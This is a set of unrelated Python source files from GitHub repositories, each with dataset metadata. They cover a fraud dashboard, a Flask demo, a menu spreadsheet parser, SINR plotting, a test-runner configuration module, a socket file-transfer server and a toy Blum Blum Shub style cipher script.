dash.dependencies.State('input1', 'start_date'),\n dash.dependencies.State('input1', 'end_date')])\ndef update_output(n_clicks,city ,start_date,end_date):\n try:\n city=list(city)\n except:\n pass \n if len(city)==0:\n return \"Город не выбран\"\n if n_clicks==None:\n return\n else:\n if str(type(start_date))=='':\n return \"Проверить дату\"\n elif str(type(end_date))=='': \n return \"Проверить дату\"\n else: \n x_n,y_n,x_y,y_y=fraud_inspector_FraudOrders(city ,start_date,end_date)\n return html.Div([\n dcc.Graph(\n figure=dict(\n data=[\n dict(\n x=x_n,\n y=y_n,\n name='НЕ ФРОД',\n marker=go.bar.Marker(\n color='rgb(55, 83, 109)'\n )\n ),\n dict(\n x=x_y,\n y=y_y,\n name='ФРОД',\n marker=go.bar.Marker(\n color='rgb(26, 118, 255)'\n )\n )\n ],\n layout=dict(\n title='FRAUD',\n showlegend=True,\n legend=go.layout.Legend(\n x=0,\n y=1.0\n ),\n margin=dict(l=40, r=0, t=40, b=30)\n )\n ),\n style={'height': 500},\n id='my-graph'\n ) \n \n ],style={'height': 800}) \n\n\n","repo_name":"avengerSAT/anti_fraud_pub","sub_path":"fraud_inspector/plotly_apps/dash_Graf.py","file_name":"dash_Graf.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13819617959","text":"from flask import Flask\nfrom flask import render_template, jsonify\n\napp = Flask(__name__)\n\n@app.route('/data_json')\ndef data_json():\n dummy_data = [\n {\n \"id\": 1,\n \"starting_time\": \"16:00\",\n \"team_a\": \"Random Team 1\",\n \"score\": \"1 - 2\",\n \"team_b\": \"Random Team 2\",\n \"minute\": \"01:00\",\n },\n {\n \"id\": 2,\n \"starting_time\": \"18:00\",\n \"team_a\": \"Random Team 3\",\n \"score\": \"1 - 1\",\n \"team_b\": \"Random Team 4\",\n \"minute\": \"05:00\",\n },\n ]\n return jsonify(dummy_data)\n\n@app.route('/')\ndef index():\n dummy_data = data_json()\n return render_template(\n 'index.html',\n matches=dummy_data.json,\n )","repo_name":"jimdevops19/LiveSportsWebsite","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"17238565099","text":"# coding=utf-8\nimport logging\nfrom methods.excel import xlrd\nfrom models import MenuCategory, MenuItem, GroupModifier, GroupModifierChoice\n\n__author__ = 'dvpermyakov'\n\n\ndef menu_parse(file_excel):\n wb = xlrd.open_workbook(file_contents=file_excel)\n sh = wb.sheet_by_index(0)\n categories = {}\n products = {}\n group_modifiers = {}\n group_choices = {}\n for row_number in range(sh.nrows):\n if row_number > 0:\n current_category = MenuCategory()\n current_item = MenuItem()\n current_modifier = GroupModifier()\n current_choice = GroupModifierChoice()\n item_add = True\n for index, cell in enumerate(sh.row_values(row_number)):\n if index == 0:\n current_category.sequence_number = int(cell)\n current_item.sequence_number = int(cell)\n elif index == 1:\n if categories.get(cell):\n current_category = categories[cell]\n else:\n current_category.title = cell\n categories[cell] = current_category\n elif index == 2:\n if products.get(cell):\n current_item = products[cell]\n item_add = False\n else:\n current_item.title = cell\n products[cell] = current_item\n elif index == 3:\n if item_add:\n current_item.description = cell\n elif index == 4 and cell:\n if item_add:\n current_item.price = int(float(cell) * 100)\n elif index == 5:\n if item_add and cell:\n current_item.volume = float(cell)\n elif index == 6:\n if item_add and cell:\n current_item.weight = float(cell)\n elif index == 7:\n if item_add and cell:\n current_item.kal = int(cell)\n elif index == 8:\n if cell:\n if group_modifiers.get(cell):\n current_modifier = group_modifiers[cell]\n else:\n current_modifier.title = cell\n group_modifiers[cell] = current_modifier\n elif index == 9:\n if cell:\n current_choice.title = cell\n elif index == 10:\n if cell or cell == 0:\n current_choice.price = int(float(cell) * 100)\n key = '%s_%s' % (current_choice.title, current_choice.price)\n if group_choices.get(key):\n current_choice = group_choices[key]\n else:\n current_choice.choice_id = GroupModifierChoice.generate_id()\n group_choices[key] = current_choice\n if current_choice not in current_modifier.choices:\n current_modifier.choices.append(current_choice)\n current_choice.put()\n logging.info(current_modifier)\n if current_modifier.title:\n current_modifier.put()\n if current_modifier.key not in current_item.group_modifiers:\n current_item.group_modifiers.append(current_modifier.key)\n current_item.put()\n if item_add:\n current_item.category = current_category.key\n current_category.put()","repo_name":"lopatinsky/automation-gae","sub_path":"methods/excel/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3424581022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 29 19:56:46 2020\n\n@author: nikbakht\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nclass Plot():\n def __init__(self,Nap,Nuser,**kwargs):\n super(Plot, self).__init__(**kwargs)\n self.Nap = Nap\n self.Nuser = Nuser\n def cdfplot(self, x):\n fig, ax = plt.subplots(1, 1)\n for i in range(len(x)):\n qe, pe = self.ecdf(10 * np.log10(x[i].flatten()))\n ax.plot(qe, pe, lw=2, label=str(i))\n\n # ax.hold(True)\n\n ax.set_xlabel('(SINR)dB')\n ax.set_ylabel('CDF')\n ax.legend(fancybox=True, loc='right')\n # plt.xlim([-10,30])\n plt.ylim([0, 1])\n plt.show()\n def ecdf(self,sample):\n # convert sample to a numpy array, if it isn't already\n sample = np.atleast_1d(sample)\n # find the unique values and their corresponding counts\n quantiles, counts = np.unique(sample, return_counts=True)\n \n # take the cumulative sum of the counts and divide by the sample size to\n # get the cumulative probabilities between 0 and 1\n cumprob = np.cumsum(counts).astype(np.double) / sample.size\n return quantiles, cumprob\n def sinr(self,SNR,p):\n Hloop =100\n Hreal = tf.random.normal([SNR.shape[0], self.Nap, self.Nuser, Hloop])\n Himag = tf.random.normal([SNR.shape[0], self.Nap, self.Nuser, Hloop])\n H = 1 / np.sqrt(2.0) * (tf.complex(Hreal, Himag))\n Habs = tf.math.abs(H)\n Habs = tf.cast(tf.math.real(Habs), 'float32')\n gain = tf.tile(tf.expand_dims(SNR,axis=3),[1,1,1,Hloop])* tf.math.square(Habs)\n num = tf.expand_dims(p,axis=2)*tf.square(tf.reduce_sum(gain,axis=1))\n\n SNR_c = tf.expand_dims(tf.complex(tf.math.sqrt(SNR),0.0),axis=3)\n gain_c_conj = tf.reshape(SNR_c*tf.math.conj(H),[H.shape[0]*Hloop,self.Nap,self.Nuser])\n gain_c = tf.reshape(SNR_c*H,[H.shape[0]*Hloop,self.Nap,self.Nuser])\n\n cross_gain = tf.linalg.matmul(gain_c_conj,gain_c,transpose_a=True)\n cross_gain = tf.math.real(tf.math.square(tf.math.abs(cross_gain)))\n p = tf.reshape(tf.tile(tf.expand_dims(p,axis=2),[1,1,Hloop]),[-1,self.Nuser,1])\n denom = tf.squeeze(tf.linalg.matmul(cross_gain,p))\n denom = denom -tf.linalg.diag_part(cross_gain)*tf.squeeze(p)\n denom = tf.reshape(denom,[H.shape[0],self.Nuser,Hloop])\n denom_noise = tf.reduce_sum(gain,axis=1)\n SINR = tf.reduce_mean(num/(denom+denom_noise),axis=2)\n return SINR\n\n def sinr_averaged_fading(self,SNR, p):\n Hloop = 100\n num = tf.zeros([SNR.shape[0], Hloop], dtype='float64')\n denom = tf.zeros(num.shape, dtype='float64')\n denomCI = tf.zeros(num.shape, dtype='float64')\n denomCH = tf.zeros(num.shape, dtype='float64')\n deonNoise = tf.zeros(num.shape, dtype='float64')\n TotalCI = tf.zeros([SNR.shape[0], self.Nuser, Hloop], dtype='float64')\n\n H = 1 / np.sqrt(2) * (np.random.randn(SNR.shape[0], self.Nap, self.Nuser, Hloop) +\n 1j * np.random.randn(SNR.shape[0], self.Nap, self.Nuser,Hloop))\n H = np.sqrt(np.tile(np.expand_dims(SNR / (1 + SNR), axis=3), [1, 1, 1, Hloop])) * H\n H = H.astype('complex64')\n SINR = np.zeros([SNR.shape[0], self.Nuser], dtype='float64')\n\n for k in range(int(self.Nuser)):\n num = (tf.tile(p[:, [k]], [1, Hloop]) * tf.square(tf.abs(np.sum(\n tf.tile(SNR[:, :, [k]], [1, 1, Hloop]) * np.square(np.abs(H[:, :, k, :])), axis=1))))\n\n TotalCI = (tf.tile(tf.expand_dims(p, axis=2), [1, 1, Hloop]) * np.square(\n np.abs(np.sum(np.tile(np.conj(H[:, :, [k], :]), [1, 1, self.Nuser, 1]) *\n np.tile(np.sqrt(tf.expand_dims(SNR[:, :, [k]], axis=3)), [1, 1, self.Nuser, Hloop]) * (\n H) * np.tile(np.sqrt(tf.expand_dims(SNR, axis=3)), [1, 1, Hloop])\n , axis=1))))\n\n denomCI = np.sum(TotalCI, axis=1) - TotalCI[:, k, :]\n\n denomCH = tf.reduce_sum(\n tf.multiply(tf.multiply(tf.tile(SNR[:, :, [k]], [1, 1, Hloop]), tf.square(tf.abs(H[:, :, k, :]))),\n tf.tile(tf.reduce_sum(\n tf.multiply(tf.tile(tf.expand_dims(p, axis=1), [1, self.Nap, 1]), tf.divide(SNR, 1 + SNR)),\n axis=2, keepdims=True), [1, 1, Hloop]))\n , axis=1)\n denomNoise = tf.reduce_sum(\n tf.multiply(tf.tile(SNR[:, :, [k]], [1, 1, Hloop]), tf.square(tf.abs(H[:, :, k, :]))), axis=1)\n\n denom = denomCI + denomCH + denomNoise\n SINR[:, [k]] = np.expand_dims(np.mean(num / denom, axis=1), axis=1)\n\n # Cost=Cost+(tf.reduce_sum(tf.exp(-10*p),axis=1))\n # Cost=tf.reduce_sum(tf.exp(-1*p),axis=1)\n # +100*tf.square(tf.norm(p,ord='euclidean',axis=1)-1)\n return SINR\n\n","repo_name":"RasoulNik/UnsupervisedNN","sub_path":"Cell-free/Plot_results_uplink.py","file_name":"Plot_results_uplink.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"3015141592","text":"def is_prime(n):\n\tif n == 2:\n\t\treturn True\n\telif n%2 == 0 or n <= 1:\n\t\treturn False\n\telse:\n\t\timport math\n\t\tfor d in range(3, int(math.sqrt(n))+1, 2):\n\t\t\tif n % d == 0:\n\t\t\t\treturn False\n\t\treturn True\n\nlooping = True\ne = 2\nnth = 1\nwhile looping:\n\tif nth < 1001:\n\t\tif is_prime(e):\n\t\t\tif nth % 10 == 0:\n\t\t\t\tprint(e)\n\t\t\t\tnth += 1\n\t\t\t\te += 1\n\t\t\telse:\n\t\t\t\tprint(\"{}\".format(e)+\" \"*(5-len(str(e))), end=\"\")\n\t\t\t\tnth += 1\n\t\t\t\te += 1\n\t\telse:\n\t\t\te += 1\n\telse:\n\t\tlooping = False\n","repo_name":"sp0002/cp2019","sub_path":"p03/q5_determine_prime.py","file_name":"q5_determine_prime.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32297994791","text":"import os\nimport platform\nimport re\nfrom optparse import OptionParser, OptionGroup\n\nfrom typing import List\n\nfrom . import __version__\n\n_properties = {}\n_options = {}\n\n\ndef get_option(option: str) -> str:\n try:\n return _options[option]\n except KeyError:\n return None\n\n\ndef get_property(key: str, default: str = None) -> str:\n \"\"\"\n Get property value.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return _properties[key]\n except KeyError:\n return default\n\n\ndef get_int_property(key: str, default: int = None) -> int:\n \"\"\"\n Get property value and convert it to int.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return int(_properties[key])\n except KeyError:\n return default\n\n\ndef get_float_property(key: str, default: float = None) -> float:\n \"\"\"\n Get property value and convert it to float.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return float(_properties[key])\n except KeyError:\n return default\n\n\ndef get_boolean_property(key: str, default: bool = None) -> bool:\n \"\"\"\n Get property value and convert it to boolean.\n If no property found, default value will be returned.\n \"\"\"\n try:\n value = _properties[key]\n if value.lower() == \"true\":\n return True\n elif value.lower() == \"false\":\n return False\n raise ValueError(\"could not convert string to boolean: %s\" % value)\n except KeyError:\n return default\n\n\ndef get_list_property(key: str, default: List[str] = None, sep: str = \",\") -> List[str]:\n \"\"\"\n Get property value and convert it to list.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return _properties[key].split(sep)\n except KeyError:\n return default\n\n\ndef load(args):\n option_args, property_args = __load_args(args)\n _parse_options(option_args)\n _load_properties_from_file()\n _parse_properties(property_args)\n\n\ndef _load_properties_from_file():\n property_file = get_option(\"property_file\")\n if property_file is not None:\n file_object = open(property_file, encoding=\"utf-8\")\n try:\n property_regex_str = r\"^([^;#].*?)=(.*?)$\"\n property_regex = re.compile(property_regex_str)\n for line in file_object:\n property_match = property_regex.search(line.strip())\n if property_match:\n _properties[property_match.group(1)] = property_match.group(2)\n finally:\n file_object.close()\n\n\ndef __load_args(args):\n property_args = []\n option_args = []\n property_regex_str = r\"^-D(.*?)=(.*?)$\" # the format of property definition must be -D=\n property_regex = re.compile(property_regex_str)\n for arg in args:\n property_match = property_regex.search(arg)\n if property_match:\n property_args.append(arg)\n else:\n option_args.append(arg)\n return option_args, property_args\n\n\ndef _parse_properties(property_args):\n property_regex_str = r\"^-D(.*?)=(.*?)$\" # the format of property definition must be -D=\n property_regex = re.compile(property_regex_str)\n for arg in property_args:\n property_match = property_regex.search(arg)\n _properties[property_match.group(1)] = property_match.group(2)\n\n\ndef _parse_options(option_args):\n parser = OptionParser(usage=\"ptest [options] [properties]\", version=\"ptest %s for Python %s\" % (__version__, platform.python_version()),\n description=\"ptest is a light test framework for Python.\")\n\n # path and property\n parser.add_option(\"-w\", \"--workspace\", action=\"store\", dest=\"workspace\", default=\".\", metavar=\"dir\",\n help=\"Specify the workspace dir (relative to working directory). Default is current working directory.\")\n parser.add_option(\"-P\", \"--python-paths\", action=\"store\", dest=\"python_paths\", default=None, metavar=\"paths\",\n help=\"Specify the additional locations (relative to workspace) where to search test libraries from when they are imported. \"\n \"Multiple paths can be given by separating them with a comma.\")\n parser.add_option(\"-p\", \"--property-file\", action=\"store\", dest=\"property_file\", default=None, metavar=\"file\",\n help=\"Specify the .ini property file (relative to workspace). \"\n \"The properties in property file will be overwritten by user defined properties in cmd line. \"\n \"Get property via get_property() in module ptest.config.\")\n\n # running\n parser.add_option(\"-R\", \"--run-failed\", action=\"store\", dest=\"run_failed\", default=None, metavar=\"file\",\n help=\"Specify the xunit result xml path (relative to workspace) and run the failed/skipped test cases in it.\")\n parser.add_option(\"-t\", \"--targets\", action=\"store\", dest=\"test_targets\", default=None, metavar=\"targets\",\n help=\"Specify the path of test targets, separated by comma. Test target can be package/module/class/method. \"\n \"The target path format is: package[.module[.class[.method]]] \"\n \"NOTE: ptest ONLY searches modules under --workspace, --python-paths and sys.path\")\n parser.add_option(\"-f\", \"--filter\", action=\"store\", dest=\"test_filter\", default=None, metavar=\"class\",\n help=\"Specify the path of test filter class, select test cases to run by the specified filter. \"\n \"The test filter class should implement class TestFilter in ptest.testfilter \"\n \"The filter path format is: package.module.class \"\n \"NOTE: ptest ONLY searches modules under --workspace, --python-paths and sys.path\")\n parser.add_option(\"-i\", \"--include-tags\", action=\"store\", dest=\"include_tags\", default=None, metavar=\"tags\",\n help=\"Select test cases to run by tags, separated by comma.\")\n parser.add_option(\"-e\", \"--exclude-tags\", action=\"store\", dest=\"exclude_tags\", default=None, metavar=\"tags\",\n help=\"Select test cases not to run by tags, separated by comma. These test cases are not run even if included with --include-tags.\")\n parser.add_option(\"-g\", \"--include-groups\", action=\"store\", dest=\"include_groups\", default=None, metavar=\"groups\",\n help=\"Select test cases to run by groups, separated by comma.\")\n parser.add_option(\"-n\", \"--test-executor-number\", action=\"store\", dest=\"test_executor_number\", metavar=\"int\",\n default=1, help=\"Specify the number of test executors. Default value is 1.\")\n\n # output\n parser.add_option(\"-o\", \"--output-dir\", action=\"store\", dest=\"output_dir\", default=\"test-output\", metavar=\"dir\",\n help=\"Specify the output dir (relative to workspace).\")\n parser.add_option(\"-r\", \"--report-dir\", action=\"store\", dest=\"report_dir\", default=\"html-report\", metavar=\"dir\",\n help=\"Specify the html report dir (relative to output dir).\")\n parser.add_option(\"-x\", \"--xunit-xml\", action=\"store\", dest=\"xunit_xml\", default=\"xunit-results.xml\",\n metavar=\"file\", help=\"Specify the xunit result xml path (relative to output dir).\")\n\n # miscellaneous\n parser.add_option(\"-l\", \"--listeners\", action=\"store\", dest=\"test_listeners\", default=None, metavar=\"class\",\n help=\"Specify the path of test listener classes, separated by comma. \"\n \"The listener class should implement class TestListener in ptest.plistener \"\n \"The listener path format is: package.module.class \"\n \"NOTE: 1. ptest ONLY searches modules under --workspace, --python-paths and sys.path \"\n \"2. The listener class must be thread safe if you set -n(--test-executor-number) greater than 1.\")\n parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False,\n help=\"Set ptest console to verbose mode.\")\n parser.add_option(\"--temp\", action=\"store\", dest=\"temp\", default=\"ptest-temp\", metavar=\"dir\",\n help=\"Specify the temp dir (relative to workspace).\")\n parser.add_option(\"--disable-screenshot\", action=\"store_true\", dest=\"disable_screenshot\", default=False,\n help=\"Disable taking screenshot for preporter.\")\n\n # tool\n parser.add_option(\"-m\", \"--merge-xunit-xmls\", action=\"store\", dest=\"merge_xunit_xmls\", default=None, metavar=\"files\",\n help=\"Merge the xunit result xmls (relative to workspace). Multiple files can be given by separating them with a comma.\"\n \"Use --to to specify the path of merged xunit result xml.\")\n parser.add_option(\"--to\", action=\"store\", dest=\"to\", default=None, metavar='path',\n help=\"Specify the 'to' destination (relative to workspace).\")\n\n # user defined properties\n parser.add_option_group(\n OptionGroup(parser, \"User defined properties\",\n \"Define properties via -D=. Get defined property via get_property() in module ptest.config.\"))\n\n options, unknown_args = parser.parse_args(option_args)\n\n # only one of the main options can be specified\n main_options = [options.test_targets, options.run_failed, options.merge_xunit_xmls]\n specified_options_count = len([option for option in main_options if option is not None])\n if specified_options_count == 0:\n parser.error(\"You must specify one of the following options: -t(--targets), -R(--run-failed), -m(--merge-xunit-xmls).\")\n elif specified_options_count > 1:\n parser.error(\"You can ONLY specify one of the following options: -t(--targets), -R(--run-failed), -m(--merge-xunit-xmls).\")\n\n # check '--to'\n if options.merge_xunit_xmls is not None and options.to is None:\n parser.error(\"You must use --to to specify the path of merged xunit result xml (--merge-xunit-xmls).\")\n\n # spilt multiple values by comma\n def split(option_value):\n return None if option_value is None else option_value.split(\",\")\n\n options.python_paths = split(options.python_paths)\n options.test_targets = split(options.test_targets)\n options.include_tags = split(options.include_tags)\n options.exclude_tags = split(options.exclude_tags)\n options.include_groups = split(options.include_groups)\n options.test_listeners = split(options.test_listeners)\n options.merge_xunit_xmls = split(options.merge_xunit_xmls)\n\n # convert to full path for options\n def join_path(base_path, sub_path):\n return os.path.abspath(os.path.join(base_path, sub_path))\n\n options.workspace = join_path(os.getcwd(), options.workspace)\n options.python_paths = None if options.python_paths is None else [join_path(options.workspace, path) for path in options.python_paths]\n options.property_file = None if options.property_file is None else join_path(options.workspace, options.property_file)\n\n options.run_failed = None if options.run_failed is None else join_path(options.workspace, options.run_failed)\n options.output_dir = join_path(options.workspace, options.output_dir)\n options.report_dir = join_path(options.output_dir, options.report_dir)\n options.xunit_xml = join_path(options.output_dir, options.xunit_xml)\n options.temp = join_path(options.workspace, options.temp)\n\n options.merge_xunit_xmls = None if options.merge_xunit_xmls is None else [join_path(options.workspace, path) for path in\n options.merge_xunit_xmls]\n options.to = None if options.to is None else join_path(options.workspace, options.to)\n\n _options.update(options.__dict__)\n","repo_name":"KarlGong/ptest","sub_path":"ptest/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"11979445450","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\n\nfrom apps.users.models import User\n\n\n@admin.register(User)\nclass UserAdmin(BaseUserAdmin):\n list_display = (\n \"id\",\n \"email\",\n \"username\",\n \"first_name\",\n \"last_name\",\n \"is_owner\",\n \"is_active\",\n \"last_login\",\n )\n list_editable = (\"is_active\", \"is_owner\")\n list_filter = (\"is_active\",)\n search_fields = (\"email\", \"first_name\", \"last_name\", \"username\")\n ordering = (\"email\",)\n list_display_links = (\"email\",)\n","repo_name":"maxxw211/sft-backend","sub_path":"apps/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28869288415","text":"import socket\nimport os\n\ndef sendFile(sock):\n filename = sock.recv(1024).decode('utf-8')\n# print(\"File Name is:\" + filename)\n\n if (os.path.isfile(filename)):\n# print('File is present.')\n message = \"EXISTS\" + str(os.path.getsize(filename))\n sock.send(message.encode('utf-8'))\n\n with open(filename,'rb') as f:\n# print(\"Opened the file\")\n bytesToSend = f.read(1024)\n sock.send(bytesToSend)\n while f.read(1):\n f.seek(-1,1)\n bytesToSend = f.read(1024)\n sock.send(bytesToSend)\n f.close()\n# print('Closed the file')\n else:\n message = \"Error\"\n sock.send(message.encode('utf-8'))\n sock.close()\n print(\"Returning from function\")\n\n\ndef Main():\n host='127.0.0.1'\n port = 1000\n\n s = socket.socket()\n s.bind((host,port))\n s.listen(5)\n\n os.chdir(\"C:\\Shrini\\Python_Practice\\Project2\\Destination_path\")\n print(\"Server is Listing\")\n\n while True:\n print(\"Inside while loop\")\n c, addr = s.accept()\n print(\"Client connected \" + str(addr))\n sendFile(c)\n print(\"At end of while loop\")\n \n s.close()\n\nif __name__ == '__main__':\n Main()\n","repo_name":"shrinivas-ankam/Python_File_Transfer_Application","sub_path":"FileTransfer.py","file_name":"FileTransfer.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5737542641","text":"from PIL import Image#, ImagePalette\nimport os, sys\n# for each file in the argument list, take off the file extension, and replace with \"_satconv.tga\"\n# clear the bottom three bits for all channel intensities in the image\nif __name__ == '__main__':\n for infile in sys.argv[1:]:\n f, e = os.path.splitext(infile) \n outfile = f + \"_satconv.tga\"\n try:\n with Image.open(infile) as im:\n out = im.point(lambda p: p & 248)\n # pal1 = ImagePalette.ImagePalette(mode ='RGB', palette = None, size = 0)\n # out = im.quantize(colors=16, palette=pal1)\n out.save(outfile)\n except OSError:\n print(\"cannot convert\", infile)","repo_name":"Team-Starlane/slideshow","sub_path":"!workfolder/eriks-rgb555-script.py","file_name":"eriks-rgb555-script.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19032867635","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n lgps_default_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Drop Channel\"),\n config_parameter='lgps.device_wizard.drop_default_channel',\n )\n\n hibernate_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Hibernate Channel\"),\n config_parameter='lgps.hibernate_device_wizard.default_channel',\n )\n\n subscription_hibernate_product_id = fields.Many2one(\n 'product.product',\n string=_(\"Default Hibernate Service\"),\n domain=[\n (\"recurring_invoice\", \"=\", True)\n ],\n config_parameter='lgps.device_wizard.hibernate_default_service',\n )\n\n subscription_hibernate_commercial_id = fields.Many2one(\n 'crm.team',\n string=_(\"Default Hibernate Commercial Team\"),\n config_parameter='lgps.device_wizard.hibernate_commercial_default',\n )\n\n subscription_hibernate_user_id = fields.Many2one(\n 'res.users',\n string=_(\"Default Hibernate Subscription User\"),\n config_parameter='lgps.device_wizard.hibernate_user_default',\n )\n\n subscription_hibernate_stage_id = fields.Many2one(\n 'sale.subscription.stage',\n string=_(\"Default Hibernate Subscription Stage\"),\n config_parameter='lgps.device_wizard.hibernate_default_subscription_stage',\n )\n\n subscription_hibernate_stage_id_currents = fields.Many2one(\n 'sale.subscription.stage',\n string=_(\"Default Hibernate Stage Current Subscriptions\"),\n config_parameter='lgps.device_wizard.hibernate_current_subscription_stage',\n )\n\n subscription_hibernate_default_price_list_id = fields.Many2one(\n 'product.pricelist',\n string=_(\"Default Hibernate Subscription Price List\"),\n config_parameter='lgps.device_wizard.hibernate_default_price_list_id',\n )\n\n subscription_hibernate_template_id = fields.Many2one(\n 'sale.subscription.template',\n string=_(\"Default Hibernate Template\"),\n config_parameter='lgps.device_wizard.hibernate_default_subscription_template',\n )\n\n replacement_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Replacements Channel\"),\n config_parameter='lgps.device_wizard.replacement_default_channel',\n )\n\n substitution_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Substitutions Channel\"),\n config_parameter='lgps.device_wizard.substitution_default_channel',\n )\n\n repairs_default_price_list_id = fields.Many2one(\n 'product.pricelist',\n string=_(\"Default Repairs Subscription Price List\"),\n config_parameter='lgps.device_wizard.repairs_default_price_list_id',\n )\n\n add_reactivation_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Add/Reactivation Channel\"),\n config_parameter='lgps.add_reactivation_device_wizard.default_channel',\n )\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n return res\n\n","repo_name":"intralix/lgps","sub_path":"lgps/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2273223451","text":"from random import randint\nfrom string import ascii_lowercase\n\n# Written by Ming Wei, Edited and Proofread by Charles\n\t\ndef isprime(number): # prime number checker based on primality test\n\tif number <= 1: # https://en.wikipedia.org/wiki/Primality_test\n\t\treturn False\n\telif number <=3:\n\t\treturn True\n\telif number % 2 == 0 or number % 3 == 0:\n\t\treturn False\n\ti = 5\n\twhile i * i <= number:\n\t\tif number % i == 0 or number % (i+2) == 0:\n\t\t\treturn False\n\t\ti += 6\n\treturn True\n\ndef gcd(a,b): # greatest common divisor based on euclid's algorithm\n\twhile b != 0: # https://en.wikipedia.org/wiki/Euclidean_algorithm\n\t\ti = a\n\t\ta = b\n\t\tb = i % b\n\treturn a\n\ndef key():\n\tp = randint(1003, 10000)\n\tq = randint(1003, 10000)\n\t\n\twhile p % 4 != 3 or q % 4 != 3 or not isprime(p) or not isprime(q): \n\t # make p and q prime and p%4=q%4=3\n\t\tif p % 4 != 3 or not isprime(p):\n\t\t\tp = randint(1003, 10000)\n\t\tif q % 4 != 3 or not isprime(q):\n\t\t\tq = randint(1003, 10000)\n\twhile p == q: #make p != q\n\t\tq = randint(1003, 10000)\n\t\tif q % 4 != 3 or not isprime(q):\n\t\t\tcontinue\n\t\t\t\n\tn = p*q\n\tprint('Your public key is :', n)\n\tprint('Your private keys are : %s and %s' %(p,q))\n\ndef encrypt():\n\tmessagelist = []\n\trando = []\n\t\n\tmessage = input('Please enter your message : ').replace(' ', '').lower()\n\twhile not message.isalpha(): # message can only be letters\n\t\tprint('Please input only letters!')\n\t\tmessage = input('Please enter your message: ').replace(' ', '').lower()\n\tpublickey = int(input('Please enter the public key: '))\n\n\tfor i in range(len(message)): # change letters to respective numbers\n\t\tmessagelist.append(ascii_lowercase.index(message[i])) \n\t\n\tseed = randint(100,10000)\n\twhile seed ** 4 < publickey: # seed squared > square root of n\n\t\tseed = randint(100,10000)\n\t\tif gcd(seed, publickey) != 1: # coprime if gcd = 1\n\t\t\tcontinue\n\tprint('Your seed is :', seed)\n\t\n\tinitno = seed * seed\n\tfor i in range(len(messagelist)): # number of int based on length of message\n\t\tif i == 0:\n\t\t\trando.append(initno % publickey)\n\t\telse:\n\t\t\trando.append((initno ** 2 ** i) % publickey) # xi = x0 ** i mod N\n\t\t\n\tfor i in range(len(messagelist)): # C = (M + x) mod 26\n\t\tmessagelist[i] = ascii_lowercase[(messagelist[i] + rando[i]) % 26]\n\tprint('Ciphertext :', ''.join(messagelist))\n\tprint('x-value :',rando[len(rando)-1]) # last random int produced\n\n\t\ndef decrypt():\n\trando = []\n\tcipherlist = []\n\t\n\tprivatep = int(input('Please enter the first private key : '))\n\tprivateq = int(input('Please enter the second private key : '))\n\tciphertext = input('Please enter the ciphertext : ').replace(' ', '')\n\tx = int(input('Please enter the x-value: '))\n\tpublickey = privatep * privateq\n\t\n\tfor i in range(len(ciphertext)):\n\t\tcipherlist.append(ascii_lowercase.index(ciphertext[i]))\n\t\n\tp = pow(x, int((privatep + 1)/4)** (len(ciphertext)-1), privatep) # formula\n\tq = pow(x, int((privateq + 1)/4)** (len(ciphertext)-1), privateq) # formula\n\tinitno = (privatep * q * pow(privatep,privateq-2,privateq) + privateq * p * pow(privateq,privatep-2,privatep)) % publickey\n\t\n\tfor i in range(len(cipherlist)):\n\t\tif i == 0:\n\t\t\trando.append(initno % publickey) \n\t\telse:\n\t\t\trando.append((initno ** 2 ** i) % publickey) # xi = x0 ** i mod N\n\n\tfor i in range(len(cipherlist)): # M = (C - x) mod N\n\t\tcipherlist[i] = ascii_lowercase[(cipherlist[i] - rando[i]) % 26]\n\tprint('This is your plaintext : ' + ''.join(cipherlist))\n\n\ndef title():\n\t\"\"\"Something silly.\"\"\"\n\tprint(\"\"\" ____ _ _ _ _ _ \n | _ \\| | | | | | | | | | \n | |_) | |_ _ _ __ ___ | |__ | |_ _ _ __ ___ ___| |__ _ _| |__ \n | _ <| | | | | '_ ` _ \\ | '_ 